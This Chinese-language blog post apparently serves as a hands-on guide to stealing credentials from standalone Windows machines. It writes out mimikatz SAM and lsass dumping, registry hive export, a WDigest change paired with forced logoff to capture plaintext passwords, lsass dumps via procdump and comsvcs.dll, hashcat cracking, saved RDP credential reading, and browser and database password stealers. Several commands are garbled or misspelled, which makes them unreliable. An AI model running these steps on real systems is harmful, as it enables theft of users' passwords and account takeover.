導(dǎo)讀

本文詳細(xì)介紹了在非域環(huán)境下，針對(duì)Windows系統(tǒng)獲取密碼的四種方法，包括在線讀取SAM文件、離線讀取SAM和lsass進(jìn)程，以及使用procdump、Power_sploit腳本、comsvcs.dll和密碼破解工具如Hashcat。還涵蓋了RDP憑證抓取和瀏覽器密碼竊取的技巧。

對(duì)于Windows（不是域環(huán)境）我們有四種方法去抓取它的密碼

1. 在線讀取SAM文件

2. 離線讀取SAM文件

3. 在線讀取Lsass進(jìn)程

4. 離線讀取Lsass進(jìn)程

在這次的blog，我們還是用的mimkatz

---

目錄

1.在線讀取SAM文件

2.離線讀取sam文件

3.在線讀取lsass進(jìn)程

4.離線讀取lsass進(jìn)程

1.任務(wù)管理器DUMP

2.通過procdump工具進(jìn)行dump

3.Power_sploit的Out_minidump的腳本

4.白名單文件 comsvcs.dll

破解lsass.dmp

5.Hashcat 

6.RDP憑證抓取

1.通過cmd讀取

2.文件夾讀取

7.瀏覽器，數(shù)據(jù)庫密碼信息讀取 

1.BrowserGhost

2.Sharp-HackBrowserData

3.數(shù)據(jù)庫密碼抓取

4.抓取各類密碼 LaZagne

1.在線讀取SAM文件

這個(gè)就是最簡單的一個(gè)做法，直接在mimikatz上面敲上這個(gè)的命令

privilege::debug

token::elebvate

lsadump::sam

這個(gè)是沒有問題的，只不過它只能讀取到NTLM hash

2.離線讀取sam文件

因?yàn)槲覀冎苯釉谀繕?biāo)機(jī)器上面讀取hash可能會(huì)報(bào)毒（本身運(yùn)行mimikatz也會(huì)報(bào)毒）所以我們就可以離線讀取，其實(shí)就是將它的注冊(cè)表中的sam導(dǎo)出

reg save hklm\sam sam.hive

reg save hklm\system system.hive

就可以看見這兩個(gè)文件 

然后就是用本地的Mimikatz去導(dǎo)出

lsadump::sam /sam:sam.hive /system:system.hive

也是能達(dá)到相應(yīng)的效果的?。。?！ 

3.在線讀取lsass進(jìn)程

這個(gè)呢，在某一些win10可以，但是在win11是不行的?。。。ㄗ钇鸫a我的不行）

lsass進(jìn)程中，存儲(chǔ)的是用戶的明文密碼，所以可能這就是導(dǎo)不出來的原因

privilege::debug

sekurlsa::logonpasswords

win11是會(huì)直接報(bào)這樣的錯(cuò)的(版本什么的我也試過了，而且我已經(jīng)是重新將密碼寫回到了注冊(cè)表) 

但是對(duì)于某些win10，以及win server2012 xp 等低版本是可以的

順便提一嘴，在一些win10版本

首先肯定是要寫入計(jì)劃表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

如果你想獲取明文密碼可以直接用以下命令 

rundll32.exe user32.dll,LockWorkStation   //這個(gè)可以直接鎖屏



或者以下方式



query user            //得到當(dāng)前用戶得id

Logff id              //這個(gè)也可以鎖屏

都能把用戶踢下線 ，當(dāng)他再輸密碼得時(shí)候，我們就可以讀取lsass進(jìn)程得明文密碼

 

4.離線讀取lsass進(jìn)程

離線讀取lsass進(jìn)程,其實(shí)就是想辦法直接把對(duì)應(yīng)得文件dump出來

1.任務(wù)管理器DUMP

前提是你得能遠(yuǎn)程到別人得電腦，然后直接在任務(wù)管理器能把他dump出來

然后你就能得到這樣的文件

2.通過procdump工具進(jìn)行dump

ProcDump 是一個(gè)命令行實(shí)用工具，其主要用途是監(jiān)視應(yīng)用程序的 CPU 峰值，并在出現(xiàn)峰值期間生成故障轉(zhuǎn)儲(chǔ)，管理員或開發(fā)人員可以使用這些轉(zhuǎn)儲(chǔ)來確定出現(xiàn)峰值的原因。 ProcDump 還支持掛起窗口監(jiān)視（使用與 Windows 和任務(wù)管理器使用的窗口掛起相同的定義）、未處理的異常監(jiān)視，并且可以根據(jù)系統(tǒng)性能計(jì)數(shù)器的值生成轉(zhuǎn)儲(chǔ)。 它還可用作可嵌入到其他腳本中的常規(guī)進(jìn)程轉(zhuǎn)儲(chǔ)實(shí)用工具。

這個(gè)是微軟自己寫的工具，一般不會(huì)報(bào)毒（360不是一般的軟件）

procdump.exe -accepteula ma sass.exe lsass.dmp

3.Power_sploit的Out_minidump的腳本

通過這個(gè)腳本是可以dump出明文hash的

但是可以能對(duì)win11不太友好，反正我是不行

4.白名單文件 comsvcs.dll

通過調(diào)用這個(gè)文件的api，可以幫我們導(dǎo)出lsass進(jìn)程

tasklist | findstr "lsass.exe"   //查找lsass進(jìn)程的pid

powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump "lsass.exe的PID" C:\lsass.dmp full"

這樣我們就可以在c盤下看見一個(gè)lsass.dmp的文件啦

破解lsass.dmp

這個(gè)是可以用mimkatz去進(jìn)行破解的！！

privilege::debug

sekurlsa::minidump lsass.dmp

sekurlsa::logonpasswords full

對(duì)于一些winserver 就算是2012以后的也是可以的 

但是win11還是不行（我真是無語了）

5.Hashcat 

這個(gè)可以跑多種的密碼包括ntlmhash

假如我們現(xiàn)在有這樣的一個(gè)ntlm hash

e25bbe456dd96a635f4434511788e502

然后用hashcat

hashcat.exe -m ntlm_hash "字典" --force

可以看見是能跑出來的

6.RDP憑證抓取

1.通過cmd讀取

如果我們進(jìn)入內(nèi)網(wǎng)之后，我們可以信息收集的時(shí)候先敲上這樣的一條命令

keycmd /list

如果在這臺(tái)電腦上登錄過其他的電腦，而且還勾選了記住我的憑證就會(huì)出現(xiàn)以下結(jié)果

2.文件夾讀取

敲上這樣的一個(gè)命令

dir /a %userprofile%\appdata\local\microsoft\credentials\*

這里放著的都是它的登錄記錄 

解密的話，可以用mimikatz進(jìn)行解密

7.瀏覽器，數(shù)據(jù)庫密碼信息讀取 

1.BrowserGhost

這個(gè)就直接運(yùn)行就好，不過只能抓chrome的（我沒用chrome）

2.Sharp-HackBrowserData

這個(gè)用的比較多，可以直接抓取你的瀏覽器得密碼

Sharp-HackBrowserData.exe   //直接運(yùn)行就好

是真的可以抓到，他會(huì)生成在result文件夾里面

3.數(shù)據(jù)庫密碼抓取

直接運(yùn)行這個(gè)文件

SharpDecryptPwd.exe  -NavicatCrypto

后面就是你的參數(shù)了

 

4.抓取各類密碼 LaZagne

這個(gè)工具就比較強(qiáng)大了，基本上可以抓很多東西

lazagne.exe all

這是win11得 

在win server 2012中我是dump出了它的ntlm 和lm hash